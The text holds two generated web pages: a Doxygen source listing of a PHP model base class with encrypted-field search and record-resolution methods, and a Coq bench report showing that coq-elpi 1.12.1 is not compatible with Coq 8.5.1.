class="lineno"> 614</span>&#160; $values = $class::prepareSearchValues($field, $values, $instance);</div> <div class="line"><a name="l00615"></a><span class="lineno"> 615</span>&#160; $result = $class::query()</div> <div class="line"><a name="l00616"></a><span class="lineno"> 616</span>&#160; -&gt;inWhere($field, $values)</div> <div class="line"><a name="l00617"></a><span class="lineno"> 617</span>&#160; -&gt;limit(1)</div> <div class="line"><a name="l00618"></a><span class="lineno"> 618</span>&#160; -&gt;execute();</div> <div class="line"><a name="l00619"></a><span class="lineno"> 619</span>&#160;</div> <div class="line"><a name="l00620"></a><span class="lineno"> 620</span>&#160; <span class="keywordflow">return</span> $result-&gt;count() &gt; 0 ? $result[0] : null;</div> <div class="line"><a name="l00621"></a><span class="lineno"> 621</span>&#160; }</div> <div class="line"><a name="l00622"></a><span class="lineno"> 622</span>&#160;</div> <div class="line"><a name="l00633"></a><span class="lineno"><a class="line" href="class_apprecie_1_1_library_1_1_model_1_1_apprecie_model_base.html#a9e1499ecafbe8878b0cf60715cf37e2c"> 633</a></span>&#160; <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">function</span> <a class="code" href="class_apprecie_1_1_library_1_1_model_1_1_apprecie_model_base.html#a9e1499ecafbe8878b0cf60715cf37e2c">findBy</a>($field, $values, <a class="code" href="class_apprecie_1_1_library_1_1_model_1_1_apprecie_model_base.html">ApprecieModelBase</a> $instance = null)</div> <div class="line"><a name="l00634"></a><span class="lineno"> 634</span>&#160; {</div> <div class="line"><a name="l00635"></a><span class="lineno"> 635</span>&#160; $class = get_called_class();</div> <div class="line"><a name="l00636"></a><span class="lineno"> 636</span>&#160; $values = $class::prepareSearchValues($field, $values, $instance);</div> <div class="line"><a name="l00637"></a><span class="lineno"> 637</span>&#160; <span class="keywordflow">return</span> $class::query()</div> <div class="line"><a name="l00638"></a><span class="lineno"> 638</span>&#160; -&gt;inWhere($field, $values)</div> <div class="line"><a name="l00639"></a><span class="lineno"> 639</span>&#160; -&gt;execute();</div> <div class="line"><a name="l00640"></a><span class="lineno"> 640</span>&#160; }</div> <div class="line"><a name="l00641"></a><span class="lineno"> 641</span>&#160;</div> <div class="line"><a name="l00651"></a><span class="lineno"><a class="line" href="class_apprecie_1_1_library_1_1_model_1_1_apprecie_model_base.html#a8b84a7be9c041bb355f361825362c2f3"> 651</a></span>&#160; <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">function</span> <a class="code" href="class_apprecie_1_1_library_1_1_model_1_1_apprecie_model_base.html#a8b84a7be9c041bb355f361825362c2f3">prepareSearchValues</a>($field, $values, <a class="code" href="class_apprecie_1_1_library_1_1_model_1_1_apprecie_model_base.html">ApprecieModelBase</a> $instance = null)</div> <div class="line"><a name="l00652"></a><span class="lineno"> 652</span>&#160; {</div> <div class="line"><a name="l00653"></a><span class="lineno"> 653</span>&#160; <span class="keywordflow">if</span> (!is_array($values)) $values = array($values);</div> <div class="line"><a name="l00654"></a><span class="lineno"> 654</span>&#160;</div> <div class="line"><a name="l00655"></a><span class="lineno"> 655</span>&#160; <span class="keywordflow">if</span> ($instance == null) {</div> <div class="line"><a name="l00656"></a><span class="lineno"> 656</span>&#160; $class = get_called_class();</div> <div class="line"><a name="l00657"></a><span class="lineno"> 657</span>&#160; $instance = <span class="keyword">new</span> $class();</div> <div class="line"><a name="l00658"></a><span class="lineno"> 658</span>&#160; }</div> <div class="line"><a name="l00659"></a><span class="lineno"> 659</span>&#160;</div> <div class="line"><a name="l00660"></a><span class="lineno"> 660</span>&#160; <span class="keywordflow">foreach</span> ($values as &amp;$val) {</div> <div class="line"><a name="l00661"></a><span class="lineno"> 661</span>&#160; <span class="keywordflow">if</span> ($instance-&gt;isEncryptionField($field)) { <span class="comment">//encrypt the values before query</span></div> <div class="line"><a name="l00662"></a><span class="lineno"> 662</span>&#160; $val = $instance-&gt;getEncryptionProvider()-&gt;encrypt($val);</div> <div class="line"><a name="l00663"></a><span class="lineno"> 663</span>&#160; }</div> <div class="line"><a name="l00664"></a><span class="lineno"> 664</span>&#160; }</div> <div class="line"><a name="l00665"></a><span class="lineno"> 665</span>&#160;</div> <div class="line"><a name="l00666"></a><span class="lineno"> 666</span>&#160; <span class="keywordflow">return</span> $values;</div> <div class="line"><a name="l00667"></a><span class="lineno"> 667</span>&#160; }</div> <div class="line"><a name="l00668"></a><span class="lineno"> 668</span>&#160;</div> <div class="line"><a name="l00682"></a><span class="lineno"><a class="line" href="class_apprecie_1_1_library_1_1_model_1_1_apprecie_model_base.html#a9f28d67421dfa63e52e28cdc42cacc46"> 682</a></span>&#160; <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">function</span> <a class="code" href="class_apprecie_1_1_library_1_1_model_1_1_apprecie_model_base.html#a9f28d67421dfa63e52e28cdc42cacc46">resolve</a>($param, $throw = <span class="keyword">true</span>, <a class="code" href="class_apprecie_1_1_library_1_1_model_1_1_apprecie_model_base.html">ApprecieModelBase</a> $instance = null)</div> <div class="line"><a name="l00683"></a><span class="lineno"> 683</span>&#160; {</div> <div class="line"><a name="l00684"></a><span class="lineno"> 684</span>&#160; $class = get_called_class();</div> <div class="line"><a name="l00685"></a><span class="lineno"> 685</span>&#160; <span class="keywordflow">if</span> ($param instanceof $class) <span class="keywordflow">return</span> $param;</div> <div class="line"><a name="l00686"></a><span class="lineno"> 686</span>&#160;</div> <div class="line"><a name="l00687"></a><span class="lineno"> 687</span>&#160; <span class="keywordflow">if</span> ($instance == null) {</div> <div class="line"><a name="l00688"></a><span class="lineno"> 688</span>&#160; $instance = <span class="keyword">new</span> $class();</div> <div class="line"><a name="l00689"></a><span class="lineno"> 689</span>&#160; }</div> <div class="line"><a name="l00690"></a><span class="lineno"> 690</span>&#160;</div> <div class="line"><a name="l00691"></a><span class="lineno"> 691</span>&#160; $key = $instance-&gt;getModelsMetaData()-&gt;getPrimaryKeyAttributes($instance);</div> <div class="line"><a name="l00692"></a><span class="lineno"> 692</span>&#160; <span class="keywordflow">if</span> (count(</div> <div class="line"><a name="l00693"></a><span class="lineno"> 693</span>&#160; $key</div> <div class="line"><a name="l00694"></a><span class="lineno"> 694</span>&#160; ) != 1</div> <div class="line"><a name="l00695"></a><span class="lineno"> 695</span>&#160; ) <span class="keywordflow">throw</span> <span class="keyword">new</span> Exception(<span class="stringliteral">&#39;Composit key models and non primary key not implemented for resolution in model base. Please implement&#39;</span>);</div> <div class="line"><a name="l00696"></a><span class="lineno"> 696</span>&#160;</div> <div class="line"><a name="l00697"></a><span class="lineno"> 697</span>&#160; $item = $class::findFirstBy($key[0], $param, $instance);</div> <div class="line"><a name="l00698"></a><span class="lineno"> 698</span>&#160; <span class="keywordflow">if</span> ($item == null &amp;&amp; $throw) {</div> <div class="line"><a name="l00699"></a><span class="lineno"> 699</span>&#160; <span class="keywordflow">throw</span> new \InvalidArgumentException(<span class="stringliteral">&#39;The requested &#39;</span> . $class . <span class="stringliteral">&#39; could not resolved to a record or object&#39;</span>);</div> <div class="line"><a name="l00700"></a><span class="lineno"> 700</span>&#160; }</div> <div class="line"><a name="l00701"></a><span class="lineno"> 701</span>&#160;</div> <div class="line"><a name="l00702"></a><span class="lineno"> 702</span>&#160; <span class="keywordflow">return</span> $item;</div> <div class="line"><a name="l00703"></a><span class="lineno"> 703</span>&#160; }</div> <div class="line"><a name="l00704"></a><span class="lineno"> 704</span>&#160;</div> <div class="line"><a name="l00705"></a><span class="lineno"> 705</span>&#160;<span class="preprocessor"> #endregion</span></div> <div class="line"><a name="l00706"></a><span class="lineno"> 706</span>&#160;<span class="preprocessor">}</span></div> <div class="ttc" id="class_apprecie_1_1_library_1_1_model_1_1_apprecie_model_base_html_a2e694a13a253400ce9b1560c63962553"><div class="ttname"><a href="class_apprecie_1_1_library_1_1_model_1_1_apprecie_model_base.html#a2e694a13a253400ce9b1560c63962553">Apprecie\Library\Model\ApprecieModelBase\isEncryptionField</a></div><div class="ttdeci">isEncryptionField($field)</div><div class="ttdef"><b>Definition:</b> <a href="_apprecie_model_base_8php_source.html#l00235">ApprecieModelBase.php:235</a></div></div> <div class="ttc" id="namespace_phalcon_1_1_exception_html"><div class="ttname"><a href="namespace_phalcon_1_1_exception.html">Exception</a></div></div> <div class="ttc" id="class_apprecie_1_1_library_1_1_model_1_1_apprecie_model_base_html_a8ad9b2acae885be4ba4613620165d579"><div class="ttname"><a href="class_apprecie_1_1_library_1_1_model_1_1_apprecie_model_base.html#a8ad9b2acae885be4ba4613620165d579">Apprecie\Library\Model\ApprecieModelBase\findFirstBy</a></div><div class="ttdeci">static findFirstBy($field, $values, ApprecieModelBase $instance=null)</div><div class="ttdef"><b>Definition:</b> <a href="_apprecie_model_base_8php_source.html#l00611">ApprecieModelBase.php:611</a></div></div> <div class="ttc" id="class_apprecie_1_1_library_1_1_model_1_1_apprecie_model_base_html_a9f28d67421dfa63e52e28cdc42cacc46"><div class="ttname"><a href="class_apprecie_1_1_library_1_1_model_1_1_apprecie_model_base.html#a9f28d67421dfa63e52e28cdc42cacc46">Apprecie\Library\Model\ApprecieModelBase\resolve</a></div><div class="ttdeci">static resolve($param, $throw=true, ApprecieModelBase $instance=null)</div><div class="ttdef"><b>Definition:</b> <a href="_apprecie_model_base_8php_source.html#l00682">ApprecieModelBase.php:682</a></div></div> <div class="ttc" id="class_apprecie_1_1_library_1_1_model_1_1_apprecie_model_base_html_ab84cf90eeb87f09b54c0bb9cfae0844b"><div class="ttname"><a href="class_apprecie_1_1_library_1_1_model_1_1_apprecie_model_base.html#ab84cf90eeb87f09b54c0bb9cfae0844b">Apprecie\Library\Model\ApprecieModelBase\createEncryptionProvider</a></div><div class="ttdeci">createEncryptionProvider()</div><div class="ttdef"><b>Definition:</b> <a href="_apprecie_model_base_8php_source.html#l00197">ApprecieModelBase.php:197</a></div></div> <div class="ttc" id="class_apprecie_1_1_library_1_1_model_1_1_apprecie_model_base_html_a9c31aa52b6e4dee9f0f9f6c3f617896f"><div class="ttname"><a href="class_apprecie_1_1_library_1_1_model_1_1_apprecie_model_base.html#a9c31aa52b6e4dee9f0f9f6c3f617896f">Apprecie\Library\Model\ApprecieModelBase\getEncryptionKey</a></div><div class="ttdeci">getEncryptionKey()</div><div class="ttdef"><b>Definition:</b> <a href="_apprecie_model_base_8php_source.html#l00207">ApprecieModelBase.php:207</a></div></div> <div class="ttc" id="interface_apprecie_1_1_library_1_1_collections_1_1_can_register_html"><div class="ttname"><a href="interface_apprecie_1_1_library_1_1_collections_1_1_can_register.html">Apprecie\Library\Collections\CanRegister</a></div><div class="ttdef"><b>Definition:</b> <a href="_can_register_8php_source.html#l00012">CanRegister.php:12</a></div></div> <div class="ttc" id="namespace_apprecie_1_1_library_1_1_model_html"><div class="ttname"><a href="namespace_apprecie_1_1_library_1_1_model.html">Apprecie\Library\Model</a></div><div class="ttdef"><b>Definition:</b> <a href="_apprecie_model_base_8php_source.html#l00009">ApprecieModelBase.php:9</a></div></div> <div class="ttc" id="namespace_apprecie_1_1_library_1_1_security_1_1_encryption_manager_html"><div class="ttname"><a href="namespace_apprecie_1_1_library_1_1_security_1_1_encryption_manager.html">EncryptionManager</a></div></div> <div class="ttc" id="namespace_phalcon_1_1_db_1_1_raw_value_html"><div class="ttname"><a href="namespace_phalcon_1_1_db_1_1_raw_value.html">RawValue</a></div></div> <div class="ttc" id="class_apprecie_1_1_library_1_1_security_1_1_encryption_manager_html_aea94b93be7ee5f392d5c19ecb522f0f7"><div class="ttname"><a href="class_apprecie_1_1_library_1_1_security_1_1_encryption_manager.html#aea94b93be7ee5f392d5c19ecb522f0f7">Apprecie\Library\Security\EncryptionManager\get</a></div><div class="ttdeci">static get($keyAsText, $cypher=MCRYPT_RIJNDAEL_256, $encryptionClass= 'Apprecie\Library\Security\Encryption')</div><div class="ttdef"><b>Definition:</b> <a href="_encryption_manager_8php_source.html#l00020">EncryptionManager.php:20</a></div></div> <div class="ttc" id="namespace_phalcon_1_1_security_html"><div class="ttname"><a href="namespace_phalcon_1_1_security.html">Security</a></div></div> <div class="ttc" id="class_apprecie_1_1_library_1_1_model_1_1_apprecie_model_base_html_ab800a096b48dc7cfc539549ba02367ac"><div class="ttname"><a href="class_apprecie_1_1_library_1_1_model_1_1_apprecie_model_base.html#ab800a096b48dc7cfc539549ba02367ac">Apprecie\Library\Model\ApprecieModelBase\getEncryptedFields</a></div><div class="ttdeci">getEncryptedFields()</div><div class="ttdef"><b>Definition:</b> <a href="_apprecie_model_base_8php_source.html#l00158">ApprecieModelBase.php:158</a></div></div> <div class="ttc" id="class_apprecie_1_1_library_1_1_model_1_1_apprecie_model_base_html_a49fed889a231292a2b9c9949c52de128"><div class="ttname"><a href="class_apprecie_1_1_library_1_1_model_1_1_apprecie_model_base.html#a49fed889a231292a2b9c9949c52de128">Apprecie\Library\Model\ApprecieModelBase\unsetBitValues</a></div><div class="ttdeci">unsetBitValues()</div><div class="ttdef"><b>Definition:</b> <a href="_apprecie_model_base_8php_source.html#l00342">ApprecieModelBase.php:342</a></div></div> <div class="ttc" id="class_apprecie_1_1_library_1_1_model_1_1_apprecie_model_base_html_a8529f9f3816efe674ad907bd1a2360d0"><div class="ttname"><a href="class_apprecie_1_1_library_1_1_model_1_1_apprecie_model_base.html#a8529f9f3816efe674ad907bd1a2360d0">Apprecie\Library\Model\ApprecieModelBase\setDefaultFields</a></div><div class="ttdeci">setDefaultFields($default)</div><div class="ttdef"><b>Definition:</b> <a href="_apprecie_model_base_8php_source.html#l00131">ApprecieModelBase.php:131</a></div></div> <div class="ttc" id="class_apprecie_1_1_library_1_1_model_1_1_apprecie_model_base_html_a5def8bf996218c5f74920eef290b1a89"><div class="ttname"><a href="class_apprecie_1_1_library_1_1_model_1_1_apprecie_model_base.html#a5def8bf996218c5f74920eef290b1a89">Apprecie\Library\Model\ApprecieModelBase\processDefaultValues</a></div><div class="ttdeci">processDefaultValues($onlyIfNull=true)</div><div class="ttdef"><b>Definition:</b> <a href="_apprecie_model_base_8php_source.html#l00310">ApprecieModelBase.php:310</a></div></div> <div class="ttc" id="class_apprecie_1_1_library_1_1_model_1_1_apprecie_model_base_html_afaa69691910f5f8f0197722d23ec2f88"><div class="ttname"><a href="class_apprecie_1_1_library_1_1_model_1_1_apprecie_model_base.html#afaa69691910f5f8f0197722d23ec2f88">Apprecie\Library\Model\ApprecieModelBase\getEncryptionProvider</a></div><div class="ttdeci">getEncryptionProvider()</div><div class="ttdef"><b>Definition:</b> <a href="_apprecie_model_base_8php_source.html#l00188">ApprecieModelBase.php:188</a></div></div> <div class="ttc" id="interface_apprecie_1_1_library_1_1_collections_1_1_is_registry_html"><div class="ttname"><a href="interface_apprecie_1_1_library_1_1_collections_1_1_is_registry.html">Apprecie\Library\Collections\IsRegistry</a></div><div class="ttdef"><b>Definition:</b> <a href="_is_registry_8php_source.html#l00021">IsRegistry.php:21</a></div></div> <div class="ttc" id="class_apprecie_1_1_library_1_1_model_1_1_apprecie_model_base_html_ae84b7722a75fa5c37ef628503346b7f9"><div class="ttname"><a href="class_apprecie_1_1_library_1_1_model_1_1_apprecie_model_base.html#ae84b7722a75fa5c37ef628503346b7f9">Apprecie\Library\Model\ApprecieModelBase\getDefaultFields</a></div><div class="ttdeci">getDefaultFields()</div><div class="ttdef"><b>Definition:</b> <a href="_apprecie_model_base_8php_source.html#l00166">ApprecieModelBase.php:166</a></div></div> <div class="ttc" id="namespace_apprecie_1_1_library_1_1_collections_1_1_is_registry_html"><div class="ttname"><a href="namespace_apprecie_1_1_library_1_1_collections_1_1_is_registry.html">IsRegistry</a></div></div> <div class="ttc" id="namespace_apprecie_1_1_library_1_1_collections_1_1_registry_html"><div class="ttname"><a href="namespace_apprecie_1_1_library_1_1_collections_1_1_registry.html">Registry</a></div></div> <div class="ttc" id="namespace_activity_trace_trait_html"><div class="ttname"><a href="namespace_activity_trace_trait.html">ActivityTraceTrait</a></div></div> <div class="ttc" id="class_apprecie_1_1_library_1_1_model_1_1_apprecie_model_base_html_a4bcc03e29cd5ea33ad13de858065135e"><div class="ttname"><a href="class_apprecie_1_1_library_1_1_model_1_1_apprecie_model_base.html#a4bcc03e29cd5ea33ad13de858065135e">Apprecie\Library\Model\ApprecieModelBase\setEncryptedFields</a></div><div class="ttdeci">setEncryptedFields($encrypted)</div><div class="ttdef"><b>Definition:</b> <a href="_apprecie_model_base_8php_source.html#l00147">ApprecieModelBase.php:147</a></div></div> <div class="ttc" id="namespace_phalcon_1_1_mvc_1_1_model_1_1_message_interface_html"><div class="ttname"><a href="namespace_phalcon_1_1_mvc_1_1_model_1_1_message_interface.html">MessageInterface</a></div></div> <div class="ttc" id="class_apprecie_1_1_library_1_1_model_1_1_apprecie_model_base_html_a9e1499ecafbe8878b0cf60715cf37e2c"><div class="ttname"><a href="class_apprecie_1_1_library_1_1_model_1_1_apprecie_model_base.html#a9e1499ecafbe8878b0cf60715cf37e2c">Apprecie\Library\Model\ApprecieModelBase\findBy</a></div><div class="ttdeci">static findBy($field, $values, ApprecieModelBase $instance=null)</div><div class="ttdef"><b>Definition:</b> <a href="_apprecie_model_base_8php_source.html#l00633">ApprecieModelBase.php:633</a></div></div> <div class="ttc" id="interface_apprecie_1_1_library_1_1_security_1_1_encryption_provider_html"><div class="ttname"><a href="interface_apprecie_1_1_library_1_1_security_1_1_encryption_provider.html">Apprecie\Library\Security\EncryptionProvider</a></div><div class="ttdef"><b>Definition:</b> <a href="_encryption_provider_8php_source.html#l00010">EncryptionProvider.php:10</a></div></div> <div class="ttc" id="namespace_apprecie_1_1_library_1_1_tracing_1_1_activity_trace_trait_html"><div class="ttname"><a href="namespace_apprecie_1_1_library_1_1_tracing_1_1_activity_trace_trait.html">ActivityTraceTrait</a></div></div> <div class="ttc" id="class_apprecie_1_1_library_1_1_model_1_1_apprecie_model_base_html_a70ec5ebfedc58756f409c37ad2df1deb"><div class="ttname"><a href="class_apprecie_1_1_library_1_1_model_1_1_apprecie_model_base.html#a70ec5ebfedc58756f409c37ad2df1deb">Apprecie\Library\Model\ApprecieModelBase\getExtractToArray</a></div><div class="ttdeci">getExtractToArray(array $fields)</div><div class="ttdef"><b>Definition:</b> <a href="_apprecie_model_base_8php_source.html#l00363">ApprecieModelBase.php:363</a></div></div> <div class="ttc" id="class_apprecie_1_1_library_1_1_model_1_1_apprecie_model_base_html_a8b84a7be9c041bb355f361825362c2f3"><div class="ttname"><a href="class_apprecie_1_1_library_1_1_model_1_1_apprecie_model_base.html#a8b84a7be9c041bb355f361825362c2f3">Apprecie\Library\Model\ApprecieModelBase\prepareSearchValues</a></div><div class="ttdeci">static prepareSearchValues($field, $values, ApprecieModelBase $instance=null)</div><div class="ttdef"><b>Definition:</b> <a href="_apprecie_model_base_8php_source.html#l00651">ApprecieModelBase.php:651</a></div></div> <div class="ttc" id="class_apprecie_1_1_library_1_1_model_1_1_apprecie_model_base_html_ae1c6dd7fff21d9c67c959c33206d1e8b"><div class="ttname"><a href="class_apprecie_1_1_library_1_1_model_1_1_apprecie_model_base.html#ae1c6dd7fff21d9c67c959c33206d1e8b">Apprecie\Library\Model\ApprecieModelBase\decryptFields</a></div><div class="ttdeci">decryptFields()</div><div class="ttdef"><b>Definition:</b> <a href="_apprecie_model_base_8php_source.html#l00282">ApprecieModelBase.php:282</a></div></div> <div class="ttc" id="class_apprecie_1_1_library_1_1_model_1_1_apprecie_model_base_html_ad19aac92fbb93ec650e8550389bb6be5"><div class="ttname"><a href="class_apprecie_1_1_library_1_1_model_1_1_apprecie_model_base.html#ad19aac92fbb93ec650e8550389bb6be5">Apprecie\Library\Model\ApprecieModelBase\getIsDecrypted</a></div><div class="ttdeci">getIsDecrypted()</div><div class="ttdef"><b>Definition:</b> <a href="_apprecie_model_base_8php_source.html#l00118">ApprecieModelBase.php:118</a></div></div> <div class="ttc" id="namespace_apprecie_1_1_library_1_1_collections_1_1_can_register_html"><div class="ttname"><a href="namespace_apprecie_1_1_library_1_1_collections_1_1_can_register.html">CanRegister</a></div></div> <div class="ttc" id="namespace_phalcon_1_1_mvc_1_1_model_html"><div class="ttname"><a href="namespace_phalcon_1_1_mvc_1_1_model.html">Model</a></div></div> <div class="ttc" id="namespace_phalcon_1_1_mvc_1_1_model_1_1_message_html"><div class="ttname"><a href="namespace_phalcon_1_1_mvc_1_1_model_1_1_message.html">Message</a></div></div> <div class="ttc" id="class_apprecie_1_1_library_1_1_model_1_1_apprecie_model_base_html"><div class="ttname"><a href="class_apprecie_1_1_library_1_1_model_1_1_apprecie_model_base.html">Apprecie\Library\Model\ApprecieModelBase</a></div><div class="ttdef"><b>Definition:</b> <a href="_apprecie_model_base_8php_source.html#l00052">ApprecieModelBase.php:52</a></div></div> <div class="ttc" id="class_apprecie_1_1_library_1_1_model_1_1_apprecie_model_base_html_a24ccf01c74e7f030e5463fa2818e1945"><div class="ttname"><a href="class_apprecie_1_1_library_1_1_model_1_1_apprecie_model_base.html#a24ccf01c74e7f030e5463fa2818e1945">Apprecie\Library\Model\ApprecieModelBase\setEncryptionProvider</a></div><div class="ttdeci">setEncryptionProvider(EncryptionProvider $provider)</div><div class="ttdef"><b>Definition:</b> <a href="_apprecie_model_base_8php_source.html#l00180">ApprecieModelBase.php:180</a></div></div> <div class="ttc" id="namespace_apprecie_1_1_library_1_1_security_1_1_encryption_provider_html"><div class="ttname"><a href="namespace_apprecie_1_1_library_1_1_security_1_1_encryption_provider.html">EncryptionProvider</a></div></div> <div class="ttc" id="class_apprecie_1_1_library_1_1_model_1_1_apprecie_model_base_html_abf330a837c0889228c7b62bc18af99b5"><div class="ttname"><a href="class_apprecie_1_1_library_1_1_model_1_1_apprecie_model_base.html#abf330a837c0889228c7b62bc18af99b5">Apprecie\Library\Model\ApprecieModelBase\encryptFields</a></div><div class="ttdeci">encryptFields()</div><div class="ttdef"><b>Definition:</b> <a href="_apprecie_model_base_8php_source.html#l00253">ApprecieModelBase.php:253</a></div></div> <div class="ttc" id="class_apprecie_1_1_library_1_1_model_1_1_apprecie_model_base_html_a12751dcdf42f432256a7455df5c3a663"><div class="ttname"><a href="class_apprecie_1_1_library_1_1_model_1_1_apprecie_model_base.html#a12751dcdf42f432256a7455df5c3a663">Apprecie\Library\Model\ApprecieModelBase\processBitValues</a></div><div class="ttdeci">processBitValues()</div><div class="ttdef"><b>Definition:</b> <a href="_apprecie_model_base_8php_source.html#l00326">ApprecieModelBase.php:326</a></div></div> <div class="ttc" id="namespace_apprecie_1_1_library_1_1_messaging_1_1_private_message_queue_html"><div class="ttname"><a href="namespace_apprecie_1_1_library_1_1_messaging_1_1_private_message_queue.html">PrivateMessageQueue</a></div></div> </div><!-- fragment --></div><!-- contents --> </div><!-- doc-content --> <!-- start footer part --> <div id="nav-path" class="navpath"><!-- id is needed for treeview function! --> <ul> <li class="navelem"><a class="el" href="dir_e3d620c6b6fdb93ed3bc6186215bde2e.html">library</a></li><li class="navelem"><a class="el" href="dir_c134011803ed50784d067acb5cce3771.html">Model</a></li><li class="navelem"><b>ApprecieModelBase.php</b></li> <li class="footer">Generated on Mon Dec 22 2014 23:59:02 for Apprecie by <a href="http://www.doxygen.org/index.html"> <img class="footer" src="doxygen.png" alt="doxygen"/></a> 1.8.8 </li> </ul> </div> </body> </html>
ApprecieOpenSource/Apprecie
public/docs/html/_apprecie_model_base_8php_source.html
HTML
mit
98,504
<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>elpi: Not compatible 👼</title> <link rel="shortcut icon" type="image/png" href="../../../../../favicon.png" /> <link href="../../../../../bootstrap.min.css" rel="stylesheet"> <link href="../../../../../bootstrap-custom.css" rel="stylesheet"> <link href="//maxcdn.bootstrapcdn.com/font-awesome/4.2.0/css/font-awesome.min.css" rel="stylesheet"> <script src="../../../../../moment.min.js"></script> <!-- HTML5 Shim and Respond.js IE8 support of HTML5 elements and media queries --> <!-- WARNING: Respond.js doesn't work if you view the page via file:// --> <!--[if lt IE 9]> <script src="https://oss.maxcdn.com/html5shiv/3.7.2/html5shiv.min.js"></script> <script src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script> <![endif]--> </head> <body> <div class="container"> <div class="navbar navbar-default" role="navigation"> <div class="container-fluid"> <div class="navbar-header"> <a class="navbar-brand" href="../../../../.."><i class="fa fa-lg fa-flag-checkered"></i> Coq bench</a> </div> <div id="navbar" class="collapse navbar-collapse"> <ul class="nav navbar-nav"> <li><a href="../..">clean / released</a></li> <li class="active"><a href="">8.5.1 / elpi - 1.12.1</a></li> </ul> </div> </div> </div> <div class="article"> <div class="row"> <div class="col-md-12"> <a href="../..">« Up</a> <h1> elpi <small> 1.12.1 <span class="label label-info">Not compatible 👼</span> </small> </h1> <p>📅 <em><script>document.write(moment("2022-03-02 19:39:01 +0000", "YYYY-MM-DD HH:mm:ss Z").fromNow());</script> (2022-03-02 19:39:01 UTC)</em><p> <h2>Context</h2> <pre># Packages matching: installed # Name # Installed # Synopsis base-bigarray base base-num base Num library distributed with the OCaml compiler base-ocamlbuild base OCamlbuild binary and libraries distributed with the OCaml compiler base-threads base base-unix base camlp5 7.14 Preprocessor-pretty-printer of OCaml conf-findutils 1 Virtual package relying on findutils conf-perl 2 Virtual package relying on perl coq 8.5.1 Formal proof management system num 0 The Num library for arbitrary-precision integer and rational arithmetic ocaml 4.02.3 The OCaml compiler (virtual package) ocaml-base-compiler 4.02.3 Official 4.02.3 release ocaml-config 1 OCaml Switch Configuration # opam file: opam-version: &quot;2.0&quot; maintainer: &quot;Enrico Tassi &lt;enrico.tassi@inria.fr&gt;&quot; authors: [ &quot;Enrico Tassi&quot; ] license: &quot;LGPL-2.1-or-later&quot; homepage: &quot;https://github.com/LPCIC/coq-elpi&quot; bug-reports: &quot;https://github.com/LPCIC/coq-elpi/issues&quot; dev-repo: &quot;git+https://github.com/LPCIC/coq-elpi&quot; build: [ [ make &quot;build&quot; &quot;COQBIN=%{bin}%/&quot; &quot;ELPIDIR=%{prefix}%/lib/elpi&quot; &quot;OCAMLWARN=&quot; ] [ make &quot;test&quot; &quot;COQBIN=%{bin}%/&quot; &quot;ELPIDIR=%{prefix}%/lib/elpi&quot; ] {with-test} ] install: [ make &quot;install&quot; &quot;COQBIN=%{bin}%/&quot; &quot;ELPIDIR=%{prefix}%/lib/elpi&quot; ] depends: [ &quot;stdlib-shims&quot; &quot;ocaml&quot; {&gt;= &quot;4.07&quot;} &quot;elpi&quot; {&gt;= &quot;1.13.6&quot; &amp; &lt; &quot;1.14.0~&quot;} &quot;coq&quot; {&gt;= &quot;8.15&quot; &amp; &lt; &quot;8.16~&quot; } ] tags: [ &quot;logpath:elpi&quot; ] synopsis: &quot;Elpi extension language for Coq&quot; description: &quot;&quot;&quot; Coq-elpi provides a Coq plugin that embeds ELPI. It also provides a way to embed Coq&#39;s terms into λProlog using the Higher-Order Abstract Syntax approach and a way to read terms back. In addition to that it exports to ELPI a set of Coq&#39;s primitives, e.g. printing a message, accessing the environment of theorems and data types, defining a new constant and so on. For convenience it also provides a quotation and anti-quotation for Coq&#39;s syntax in λProlog. E.g. `{{nat}}` is expanded to the type name of natural numbers, or `{{A -&gt; B}}` to the representation of a product by unfolding the `-&gt;` notation. Finally it provides a way to define new vernacular commands and new tactics.&quot;&quot;&quot; url { src: &quot;https://github.com/LPCIC/coq-elpi/archive/v1.12.1.tar.gz&quot; checksum: &quot;sha256=32eac6be5172eb945df6e80b1b6e0b784cbf1d7dca15ee780bb60716a0bb9ce5&quot; } </pre> <h2>Lint</h2> <dl class="dl-horizontal"> <dt>Command</dt> <dd><code>true</code></dd> <dt>Return code</dt> <dd>0</dd> </dl> <h2>Dry install 🏜️</h2> <p>Dry install with the current Coq version:</p> <dl class="dl-horizontal"> <dt>Command</dt> <dd><code>opam install -y --show-action coq-elpi.1.12.1 coq.8.5.1</code></dd> <dt>Return code</dt> <dd>5120</dd> <dt>Output</dt> <dd><pre>[NOTE] Package coq is already installed (current version is 8.5.1). The following dependencies couldn&#39;t be met: - coq-elpi -&gt; ocaml &gt;= 4.07 base of this switch (use `--unlock-base&#39; to force) No solution found, exiting </pre></dd> </dl> <p>Dry install without Coq/switch base, to test if the problem was incompatibility with the current Coq/OCaml version:</p> <dl class="dl-horizontal"> <dt>Command</dt> <dd><code>opam remove -y coq; opam install -y --show-action --unlock-base coq-elpi.1.12.1</code></dd> <dt>Return code</dt> <dd>0</dd> </dl> <h2>Install dependencies</h2> <dl class="dl-horizontal"> <dt>Command</dt> <dd><code>true</code></dd> <dt>Return code</dt> <dd>0</dd> <dt>Duration</dt> <dd>0 s</dd> </dl> <h2>Install 🚀</h2> <dl class="dl-horizontal"> <dt>Command</dt> <dd><code>true</code></dd> <dt>Return code</dt> <dd>0</dd> <dt>Duration</dt> <dd>0 s</dd> </dl> <h2>Installation size</h2> <p>No files were installed.</p> <h2>Uninstall 🧹</h2> <dl class="dl-horizontal"> <dt>Command</dt> <dd><code>true</code></dd> <dt>Return code</dt> <dd>0</dd> <dt>Missing removes</dt> <dd> none </dd> <dt>Wrong removes</dt> <dd> none </dd> </dl> </div> </div> </div> <hr/> <div class="footer"> <p class="text-center"> Sources are on <a href="https://github.com/coq-bench">GitHub</a> © Guillaume Claret 🐣 </p> </div> </div> <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.1/jquery.min.js"></script> <script src="../../../../../bootstrap.min.js"></script> </body> </html>
coq-bench/coq-bench.github.io
clean/Linux-x86_64-4.02.3-2.0.6/released/8.5.1/elpi/1.12.1.html
HTML
mit
7,729
